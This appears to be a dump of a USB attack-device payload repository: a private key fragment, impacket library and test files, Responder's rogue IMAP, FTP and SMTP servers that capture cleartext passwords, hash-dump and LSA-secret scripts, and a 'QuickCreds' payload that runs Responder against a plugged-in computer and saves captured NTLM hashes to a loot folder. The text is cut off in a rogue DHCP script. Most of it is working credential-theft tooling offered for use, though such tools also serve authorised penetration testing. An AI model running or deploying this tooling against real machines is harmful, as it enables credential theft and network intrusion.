VGPFmbt8vpryfpCKIRJRZpInhFT2r0WKPCGiMQeV0qACOhDjrQC+ApXODF6mJOTm 24 | kaWQ5QKBgHE0pD2GAZwqlvKCM5YmBvDpebaBNwpvoY22e2jzyuQF6cmw85eAtp35 25 | f92PeuiYyaXuLgL2BR4HSYSjwggxh31JJnRccIxSamATrGOiWnIttDsCB5/WibOp 26 | MKuFj26d01imFixufclvZfJxbAvVy4H9hmyjgtycNY+Gp5/CLgDC 27 | -----END RSA PRIVATE KEY----- 28 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/Dot11KeyManager.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2003-2016 CORE Security Technologies 2 | # 3 | # This software is provided under under a slightly modified version 4 | # of the Apache Software License. See the accompanying LICENSE file 5 | # for more information. 6 | # 7 | # Description: 8 | # IEEE 802.11 Network packet codecs. 9 | # 10 | # Author: 11 | # Gustavo Moreira 12 | 13 | from array import array 14 | class KeyManager: 15 | def __init__(self): 16 | self.keys = {} 17 | 18 | def __get_bssid_hasheable_type(self, bssid): 19 | # List is an unhashable type 20 | if not isinstance(bssid, (list,tuple,array)): 21 | raise Exception('BSSID datatype must be a tuple, list or array') 22 | return tuple(bssid) 23 | 24 | def add_key(self, bssid, key): 25 | bssid=self.__get_bssid_hasheable_type(bssid) 26 | if not bssid in self.keys: 27 | self.keys[bssid] = key 28 | return True 29 | else: 30 | return False 31 | 32 | def replace_key(self, bssid, key): 33 | bssid=self.__get_bssid_hasheable_type(bssid) 34 | self.keys[bssid] = key 35 | 36 | return True 37 | 38 | def get_key(self, bssid): 39 | bssid=self.__get_bssid_hasheable_type(bssid) 40 | if self.keys.has_key(bssid): 41 | return self.keys[bssid] 42 | else: 43 | return False 44 | 45 | def delete_key(self, bssid): 46 | bssid=self.__get_bssid_hasheable_type(bssid) 47 | if not isinstance(bssid, list): 48 | raise Exception('BSSID datatype must be a list') 49 | 50 | if self.keys.has_key(bssid): 51 | del self.keys[bssid] 52 | return True 53 | 54 | return False 55 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/setup.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # $Id$ 3 | 4 | import glob 5 | import os 6 | 7 | from distutils.core import setup 8 | 9 | PACKAGE_NAME = "impacket" 10 | 11 | setup(name = PACKAGE_NAME, 12 | version = "0.9.16-dev", 13 | description = "Network protocols Constructors and Dissectors", 14 | url = "https://www.coresecurity.com/corelabs-research/open-source-tools/impacket", 15 | author = "Core Security Technologies", 16 | author_email = "oss@coresecurity.com", 17 | maintainer = "Alberto Solino", 18 | maintainer_email = "bethus@gmail.com", 19 | license = "Apache modified", 20 | long_description = 'Impacket is a collection of Python classes focused on providing access to network packets. Impacket allows Python developers to craft and decode network packets in simple and consistent manner.', 21 | platforms = ["Unix","Windows"], 22 | packages = ['impacket', 'impacket.dcerpc', 'impacket.examples', 'impacket.dcerpc.v5', 'impacket.dcerpc.v5.dcom', 'impacket.krb5', 'impacket.ldap', 'impacket.examples.ntlmrelayx', 'impacket.examples.ntlmrelayx.clients', 'impacket.examples.ntlmrelayx.servers', 'impacket.examples.ntlmrelayx.utils'], 23 | scripts = glob.glob(os.path.join('examples', '*.py')), 24 | data_files = [(os.path.join('share', 'doc', PACKAGE_NAME), ['README.md', 'LICENSE']+glob.glob('doc/*')), 25 | (os.path.join('share', 'doc', PACKAGE_NAME, 'testcases', 'dot11'),glob.glob('impacket/testcases/dot11/*')), 26 | (os.path.join('share', 'doc', PACKAGE_NAME, 'testcases', 'ImpactPacket'),glob.glob('impacket/testcases/ImpactPacket/*')), 27 | (os.path.join('share', 'doc', PACKAGE_NAME, 'testcases', 'SMB_RPC'),glob.glob('impacket/testcases/SMB_RPC/*'))], 28 | requires=['pycrypto (>=2.6)', 'pyasn1 (>=0.1.8)'], 29 | ) 30 | -------------------------------------------------------------------------------- /payloads/library/bunny_helpers.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | ################################################################################ 4 | # Get target ip address and hostname from dhcp lease. 5 | # This is for the attack mode of ETHERNET specified. 6 | # Without ETHERNET specified, below environment variables will be empty. 7 | # 8 | # How this works? 9 | # 1) ATTACKMODE waits until: 10 | # a) target ip address is negotiated by dhcp 11 | # b) time out 12 | # 2) After ATTACKMODE, we can get target ip address and hostname. 13 | ################################################################################ 14 | leasefile="/var/lib/dhcp/dhcpd.leases" 15 | export TARGET_IP=$(cat $leasefile | grep ^lease | awk '{ print $2 }' | sort | uniq) 16 | export TARGET_HOSTNAME=$(cat $leasefile | grep hostname | awk '{print $2 }' \ 17 | | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//') 18 | export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'}) 19 | 20 | ################################################################################ 21 | # Get switch position 22 | # Taken from bash_bunny.sh 23 | ################################################################################ 24 | 25 | check_switch() { 26 | switch1=`cat /sys/class/gpio_sw/PA8/data` 27 | switch2=`cat /sys/class/gpio_sw/PL4/data` 28 | switch3=`cat /sys/class/gpio_sw/PL3/data` 29 | echo "--- switch1 = $switch1, switch2 = $switch2, switch3 = $switch3" 30 | if [ "x$switch1" = "x0" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x1" ]; then 31 | SWITCH_POSITION="switch1" 32 | elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x0" ] && [ "x$switch3" = "x1" ]; then 33 | SWITCH_POSITION="switch2" 34 | elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x0" ]; then 35 | SWITCH_POSITION="switch3" 36 | else 37 | SWITCH_POSITION="invalid" 38 | fi 39 | } 40 | 41 | check_switch 42 | export SWITCH_POSITION -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_helper.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Copyright (c) 2003-2013 CORE Security Technologies 4 | # 5 | # This software is provided under under a slightly modified version 6 | # of the Apache Software License. See the accompanying LICENSE file 7 | # for more information. 8 | # 9 | # $Id$ 10 | # 11 | # Description: 12 | # Tests for helper used to build ProtocolPackets 13 | # 14 | # Author: 15 | # Aureliano Calvo 16 | 17 | # sorry, this is very ugly, but I'm in python 2.5 18 | import sys 19 | sys.path.insert(0,"../../..") 20 | 21 | 22 | import unittest 23 | import impacket.helper as h 24 | 25 | 26 | 27 | class TestHelpers(unittest.TestCase): 28 | 29 | def test_well_formed(self): 30 | class MockPacket(h.ProtocolPacket): 31 | byte_field = h.Byte(0) 32 | word_field = h.Word(1, ">") 33 | three_bytes_field = h.ThreeBytesBigEndian(3) 34 | long_field = h.Long(6, ">") 35 | aliased_bit_field = h.Bit(0,0) 36 | 37 | header_size = 4 38 | tail_size = 0 39 | 40 | p = MockPacket() 41 | p.byte_field = 1 42 | p.word_field = 2 43 | p.three_bytes_field = 4 44 | p.long_field = 8 45 | 46 | self.assertEqual(1, p.byte_field) 47 | self.assertEqual(2, p.word_field) 48 | self.assertEqual(4, p.three_bytes_field) 49 | self.assertEqual(8, p.long_field) 50 | 51 | self.assertEqual(True, p.aliased_bit_field) 52 | 53 | p.aliased_bit_field = False 54 | 55 | self.assertEqual(0, p.byte_field) 56 | 57 | self.assertEqual(p.get_packet(), MockPacket(p.get_packet()).get_packet()) # it is the same packet after reprocessing. 58 | 59 | 60 | suite = unittest.TestLoader().loadTestsFromTestCase(TestHelpers) 61 | unittest.TextTestRunner(verbosity=2).run(suite) -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/servers/IMAP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | from utils import * 18 | from SocketServer import BaseRequestHandler 19 | from packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd 20 | 21 | class IMAP(BaseRequestHandler): 22 | def handle(self): 23 | try: 24 | self.request.send(str(IMAPGreeting())) 25 | data = self.request.recv(1024) 26 | 27 | if data[5:15] == "CAPABILITY": 28 | RequestTag = data[0:4] 29 | self.request.send(str(IMAPCapability())) 30 | self.request.send(str(IMAPCapabilityEnd(Tag=RequestTag))) 31 | data = self.request.recv(1024) 32 | 33 | if data[5:10] == "LOGIN": 34 | Credentials = data[10:].strip() 35 | 36 | SaveToDb({ 37 | 'module': 'IMAP', 38 | 'type': 'Cleartext', 39 | 'client': self.client_address[0], 40 | 'user': Credentials[0], 41 | 'cleartext': Credentials[1], 42 | 'fullhash': Credentials[0]+":"+Credentials[1], 43 | }) 44 | 45 | ## FIXME: Close connection properly 46 | ## self.request.send(str(ditchthisconnection())) 47 | ## data = self.request.recv(1024) 48 | except Exception: 49 | pass 50 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/MultiRelay/creddump/lsadump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # This file is part of creddump. 4 | # 5 | # creddump is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # creddump is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with creddump. If not, see . 17 | 18 | """ 19 | @author: Brendan Dolan-Gavitt 20 | @license: GNU General Public License 2.0 or later 21 | @contact: bdolangavitt@wesleyan.edu 22 | """ 23 | 24 | import sys 25 | from framework.win32.lsasecrets import get_file_secrets 26 | 27 | # Hex dump code from 28 | # http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/142812 29 | 30 | FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)]) 31 | 32 | def dump(src, length=8): 33 | N=0; result='' 34 | while src: 35 | s,src = src[:length],src[length:] 36 | hexa = ' '.join(["%02X"%ord(x) for x in s]) 37 | s = s.translate(FILTER) 38 | result += "%04X %-*s %s\n" % (N, length*3, hexa, s) 39 | N+=length 40 | return result 41 | 42 | if len(sys.argv) < 3: 43 | print "usage: %s Bootkey " % sys.argv[0] 44 | sys.exit(1) 45 | 46 | secrets = get_file_secrets(sys.argv[1].decode("hex"), sys.argv[2]) 47 | if not secrets: 48 | print "Unable to read LSA secrets. Perhaps you provided invalid hive files?" 49 | sys.exit(1) 50 | 51 | for k in secrets: 52 | print k 53 | print dump(secrets[k], length=16) 54 | 55 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/servers/FTP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | from utils import * 18 | from SocketServer import BaseRequestHandler 19 | from packets import FTPPacket 20 | 21 | class FTP(BaseRequestHandler): 22 | def handle(self): 23 | try: 24 | self.request.send(str(FTPPacket())) 25 | data = self.request.recv(1024) 26 | 27 | if data[0:4] == "USER": 28 | User = data[5:].strip() 29 | 30 | Packet = FTPPacket(Code="331",Message="User name okay, need password.") 31 | self.request.send(str(Packet)) 32 | data = self.request.recv(1024) 33 | 34 | if data[0:4] == "PASS": 35 | Pass = data[5:].strip() 36 | 37 | Packet = FTPPacket(Code="530",Message="User not logged in.") 38 | self.request.send(str(Packet)) 39 | data = self.request.recv(1024) 40 | 41 | SaveToDb({ 42 | 'module': 'FTP', 43 | 'type': 'Cleartext', 44 | 'client': self.client_address[0], 45 | 'user': User, 46 | 'cleartext': Pass, 47 | 'fullhash': User + ':' + Pass 48 | }) 49 | 50 | else: 51 | Packet = FTPPacket(Code="502",Message="Command not implemented.") 52 | self.request.send(str(Packet)) 53 | data = self.request.recv(1024) 54 | 55 | except Exception: 56 | pass 57 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/DumpHash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | import sqlite3 18 | 19 | def DumpHashToFile(outfile, data): 20 | with open(outfile,"w") as dump: 21 | dump.write(data) 22 | 23 | def DbConnect(): 24 | cursor = sqlite3.connect("./Responder.db") 25 | return cursor 26 | 27 | def GetResponderCompleteNTLMv2Hash(cursor): 28 | res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v2%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)") 29 | Output = "" 30 | for row in res.fetchall(): 31 | Output += '{0}'.format(row[0])+'\n' 32 | return Output 33 | 34 | def GetResponderCompleteNTLMv1Hash(cursor): 35 | res = cursor.execute("SELECT fullhash FROM Responder WHERE type LIKE '%v1%' AND UPPER(user) in (SELECT DISTINCT UPPER(user) FROM Responder)") 36 | Output = "" 37 | for row in res.fetchall(): 38 | Output += '{0}'.format(row[0])+'\n' 39 | return Output 40 | 41 | cursor = DbConnect() 42 | print "Dumping NTLMV2 hashes:" 43 | v2 = GetResponderCompleteNTLMv2Hash(cursor) 44 | DumpHashToFile("DumpNTLMv2.txt", v2) 45 | print v2 46 | print "\nDumping NTLMv1 hashes:" 47 | v1 = GetResponderCompleteNTLMv1Hash(cursor) 48 | DumpHashToFile("DumpNTLMv1.txt", v1) 49 | print v1 50 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlACK.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFrameACK 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlACK(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame ACK 15 | self.frame_orig='\xd4\x00\x00\x00\x00\x08\x54\xac\x2f\x85\xb7\x7f\xc3\x9e' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_ACKNOWLEDGMENT) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_ACKNOWLEDGMENT) 27 | 28 | self.ack = Dot11ControlFrameACK(d.get_body_as_string()) 29 | 30 | d.contains(self.ack) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.ack.get_header_size(), 8) 35 | self.assertEqual(self.ack.get_tail_size(), 0) 36 | 37 | def test_02_Duration(self): 38 | 'Test Duration field' 39 | 40 | self.assertEqual(self.ack.get_duration(), 0) 41 | self.ack.set_duration(0x1234) 42 | self.assertEqual(self.ack.get_duration(), 0x1234) 43 | 44 | def test_03_RA(self): 45 | 'Test RA field' 46 | 47 | ra=self.ack.get_ra() 48 | self.assertEqual(ra.tolist(), [0x00,0x08,0x54,0xac,0x2f,0x85]) 49 | ra[0]=0x12 50 | ra[5]=0x34 51 | self.ack.set_ra(ra) 52 | self.assertEqual(self.ack.get_ra().tolist(), [0x12,0x08,0x54,0xac,0x2f,0x34]) 53 | 54 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlACK) 55 | unittest.TextTestRunner(verbosity=2).run(suite) 56 | 57 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlCTS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFrameCTS 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlCTS(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame CTS 15 | self.frame_orig='\xc4\x00\x3b\x12\x00\x19\xe0\x98\x04\xd4\x2b\x8a\x65\x17' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_CLEAR_TO_SEND) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_CLEAR_TO_SEND) 27 | 28 | self.cts = Dot11ControlFrameCTS(d.get_body_as_string()) 29 | 30 | d.contains(self.cts) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.cts.get_header_size(), 8) 35 | self.assertEqual(self.cts.get_tail_size(), 0) 36 | 37 | def test_02_Duration(self): 38 | 'Test Duration field' 39 | 40 | self.assertEqual(self.cts.get_duration(), 4667) 41 | self.cts.set_duration(0x1234) 42 | self.assertEqual(self.cts.get_duration(), 0x1234) 43 | 44 | def test_03_RA(self): 45 | 'Test RA field' 46 | 47 | ra=self.cts.get_ra() 48 | 49 | self.assertEqual(ra.tolist(), [0x00,0x19,0xe0,0x98,0x04,0xd4]) 50 | ra[0]=0x12 51 | ra[5]=0x34 52 | self.cts.set_ra(ra) 53 | self.assertEqual(self.cts.get_ra().tolist(), [0x12,0x19,0xe0,0x98,0x04,0x34]) 54 | 55 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlCTS) 56 | unittest.TextTestRunner(verbosity=2).run(suite) 57 | 58 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/SMB_RPC/test_nmb.py: -------------------------------------------------------------------------------- 1 | import ConfigParser 2 | import unittest 3 | 4 | from impacket import nmb 5 | 6 | 7 | class NMBTests(unittest.TestCase): 8 | def create_connection(self): 9 | pass 10 | 11 | def test_getnetbiosname(self): 12 | n = nmb.NetBIOS() 13 | res = n.getnetbiosname(self.machine) 14 | print repr(res) 15 | self.assertTrue( self.serverName, res) 16 | 17 | def test_getnodestatus(self): 18 | n = nmb.NetBIOS() 19 | resp = n.getnodestatus(self.serverName.upper(), self.machine) 20 | print resp 21 | 22 | def test_gethostbyname(self): 23 | n = nmb.NetBIOS() 24 | n.set_nameserver(self.serverName) 25 | resp = n.gethostbyname(self.serverName, nmb.TYPE_SERVER) 26 | print resp.entries 27 | 28 | def test_name_registration_request(self): 29 | n = nmb.NetBIOS() 30 | # ToDo: Look at this 31 | #resp = n.name_registration_request('*SMBSERVER', self.serverName, nmb.TYPE_WORKSTATION, None,nmb.NB_FLAGS_G, '1.1.1.1') 32 | resp = n.name_registration_request('*JSMBSERVER', self.serverName, nmb.TYPE_WORKSTATION, None,nmb.NB_FLAGS_ONT_P, '1.1.1.2') 33 | resp.dump() 34 | 35 | def test_name_query_request(self): 36 | n = nmb.NetBIOS() 37 | # ToDo: Look at this 38 | # resp = n.name_registration_request('*SMBSERVER', self.serverName, nmb.TYPE_WORKSTATION, None,nmb.NB_FLAGS_G, '1.1.1.1') 39 | resp = n.name_query_request(self.serverName, self.machine) 40 | print resp.entries 41 | 42 | class NetBIOSTests(NMBTests): 43 | def setUp(self): 44 | NMBTests.setUp(self) 45 | # Put specific configuration for target machine with SMB1 46 | configFile = ConfigParser.ConfigParser() 47 | configFile.read('dcetests.cfg') 48 | self.serverName = configFile.get('SMBTransport', 'servername') 49 | self.machine = configFile.get('SMBTransport', 'machine') 50 | 51 | if __name__ == "__main__": 52 | suite = unittest.TestLoader().loadTestsFromTestCase(NetBIOSTests) 53 | unittest.TextTestRunner(verbosity=1).run(suite) 54 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/servers/SMTP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | from utils import * 18 | from base64 import b64decode 19 | from SocketServer import BaseRequestHandler 20 | from packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2 21 | 22 | class ESMTP(BaseRequestHandler): 23 | 24 | def handle(self): 25 | try: 26 | self.request.send(str(SMTPGreeting())) 27 | data = self.request.recv(1024) 28 | 29 | if data[0:4] == "EHLO": 30 | self.request.send(str(SMTPAUTH())) 31 | data = self.request.recv(1024) 32 | 33 | if data[0:4] == "AUTH": 34 | self.request.send(str(SMTPAUTH1())) 35 | data = self.request.recv(1024) 36 | 37 | if data: 38 | try: 39 | User = filter(None, b64decode(data).split('\x00')) 40 | Username = User[0] 41 | Password = User[1] 42 | except: 43 | Username = b64decode(data) 44 | 45 | self.request.send(str(SMTPAUTH2())) 46 | data = self.request.recv(1024) 47 | 48 | if data: 49 | try: Password = b64decode(data) 50 | except: Password = data 51 | 52 | SaveToDb({ 53 | 'module': 'SMTP', 54 | 'type': 'Cleartext', 55 | 'client': self.client_address[0], 56 | 'user': Username, 57 | 'cleartext': Password, 58 | 'fullhash': Username+":"+Password, 59 | }) 60 | 61 | except Exception: 62 | pass 63 | -------------------------------------------------------------------------------- /payloads/library/QuickCreds/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Quick Creds 4 | # Author: Hak5Darren -- Cred: Mubix 5 | # Version: 1.0 6 | # 7 | # Runs responder against target with specified options 8 | # Saves sequential logs to mass storage loot folder 9 | # 10 | # Requires responder in /pentest/responder - run tools_installer payload first 11 | # 12 | # White Blinking.....Dependencies not met. Responder not installed in /pentest 13 | # Red ...............Setup 14 | # Red Blinking.......Setup Failed. Target did not obtain IP address. Exit. 15 | # Amber Blinking.....Scanning 16 | # Green..............Finished 17 | # 18 | # Options 19 | RESPONDER_OPTIONS="-w -r -d -P" 20 | LOOTDIR=/root/udisk/loot/quickcreds 21 | 22 | # Check for responder. If not found, blink WHITE and end. 23 | if [ ! -d /pentest/responder/ ]; then 24 | LED R G B 100 25 | exit 1 26 | fi 27 | 28 | # Set LED Red while setting up attack 29 | LED R 30 | 31 | # Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET 32 | ATTACKMODE RNDIS_ETHERNET 33 | #ATTACKMODE ECM_ETHERNET 34 | 35 | # Source bunny_helpers.sh for functions & variables TARGET_IP, TARGET_HOSTNAME 36 | source bunny_helpers.sh 37 | 38 | # Setup named logs in loot directory 39 | mkdir -p $LOOTDIR 40 | HOST=${TARGET_HOSTNAME} 41 | # If hostname is blank set it to "noname" 42 | [[ -z "$HOST" ]] && HOST="noname" 43 | COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l) 44 | COUNT=$((COUNT+1)) 45 | mkdir -p $LOOTDIR/$HOST-$COUNT 46 | 47 | # As a backup also copy logs to a loot directory in /root/loot/ 48 | mkdir -p /root/loot/quickcreds/$HOST-$COUNT 49 | 50 | # Check target IP address. If unset, blink RED and end. 51 | if [ -z "${TARGET_IP}" ]; then 52 | LED R 100 53 | exit 1 54 | fi 55 | 56 | # Set LED yellow, run attack 57 | LED G R 500 58 | cd /pentest/responder 59 | 60 | # Clean logs directory 61 | rm logs/* 62 | 63 | # Run Responder with specified options 64 | python Responder.py -I usb0 $RESPONDER_OPTIONS & 65 | 66 | # Wait until NTLM log is found 67 | until [ -f logs/*NTLM* ] 68 | do 69 | # Ima just loop here until NTLM logs are found 70 | sleep 1 71 | done 72 | 73 | # copy logs to loot directory 74 | cp logs/* /root/loot/quickcreds/$HOST-$COUNT 75 | cp logs/* $LOOTDIR/$HOST-$COUNT 76 | 77 | # Sync USB disk filesystem 78 | sync 79 | 80 | # Light turns green - trap is clean. 81 | LED G -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/opdump.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """opdump - scan for operations on a given DCERPC interface 3 | 4 | Usage: opdump.py hostname port interface version 5 | 6 | This binds to the given hostname:port and DCERPC interface. Then, it tries to 7 | call each of the first 256 operation numbers in turn and reports the outcome 8 | of each call. 9 | 10 | This will generate a burst of TCP connections to the given host:port! 11 | 12 | Example: 13 | $ ./opdump.py 10.0.0.30 135 99FCFEC4-5260-101B-BBCB-00AA0021347A 0.0 14 | op 0 (0x00): rpc_x_bad_stub_data 15 | op 1 (0x01): rpc_x_bad_stub_data 16 | op 2 (0x02): rpc_x_bad_stub_data 17 | op 3 (0x03): success 18 | op 4 (0x04): rpc_x_bad_stub_data 19 | ops 5-255: nca_s_op_rng_error 20 | 21 | rpc_x_bad_stub_data, rpc_s_access_denied, and success generally means there's an 22 | operation at that number. 23 | 24 | Author: Catalin Patulea 25 | """ 26 | import sys 27 | 28 | from impacket.examples import logger 29 | from impacket import uuid 30 | from impacket.dcerpc.v5 import transport 31 | 32 | 33 | def main(args): 34 | if len(args) != 4: 35 | print "usage: opdump.py hostname port interface version" 36 | return 1 37 | 38 | host, port, interface, version = args[0], int(args[1]), args[2], args[3] 39 | 40 | stringbinding = "ncacn_ip_tcp:%s" % host 41 | trans = transport.DCERPCTransportFactory(stringbinding) 42 | trans.set_dport(port) 43 | 44 | results = [] 45 | for i in range(256): 46 | dce = trans.get_dce_rpc() 47 | dce.connect() 48 | 49 | iid = uuid.uuidtup_to_bin((interface, version)) 50 | dce.bind(iid) 51 | 52 | dce.call(i, "") 53 | try: 54 | dce.recv() 55 | except Exception, e: 56 | result = str(e) 57 | else: 58 | result = "success" 59 | 60 | dce.disconnect() 61 | 62 | results.append(result) 63 | 64 | # trim duplicate suffixes from the back 65 | suffix = results[-1] 66 | while results and results[-1] == suffix: 67 | results.pop() 68 | 69 | for i, result in enumerate(results): 70 | print "op %d (0x%02x): %s" % (i, i, result) 71 | 72 | print "ops %d-%d: %s" % (len(results), 255, suffix) 73 | 74 | if __name__ == "__main__": 75 | # Init the example's logger theme 76 | logger.init() 77 | sys.exit(main(sys.argv[1:])) 78 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/DHCP_Auto.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # This file is part of Responder. laurent.gaffie@gmail.com 3 | # 4 | # 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | 18 | # This script will try to auto-detect network parameters 19 | # to run the rogue DHCP server, to inject only your IP 20 | # address as the primary DNS server and WPAD server and 21 | # leave everything else normal. 22 | 23 | if [ -z $1 ]; then 24 | echo "usage: $0 " 25 | exit 26 | fi 27 | 28 | if [ $EUID -ne 0 ]; then 29 | echo "Must be run as root." 30 | exit 31 | fi 32 | 33 | if [ ! -d "/sys/class/net/$1" ]; then 34 | echo "Interface does not exist." 35 | exit 36 | fi 37 | 38 | INTF=$1 39 | PATH="$PATH:/sbin" 40 | IPADDR=`ifconfig $INTF | sed -n 's/inet addr/inet/; s/inet[ :]//p' | awk '{print $1}'` 41 | NETMASK=`ifconfig 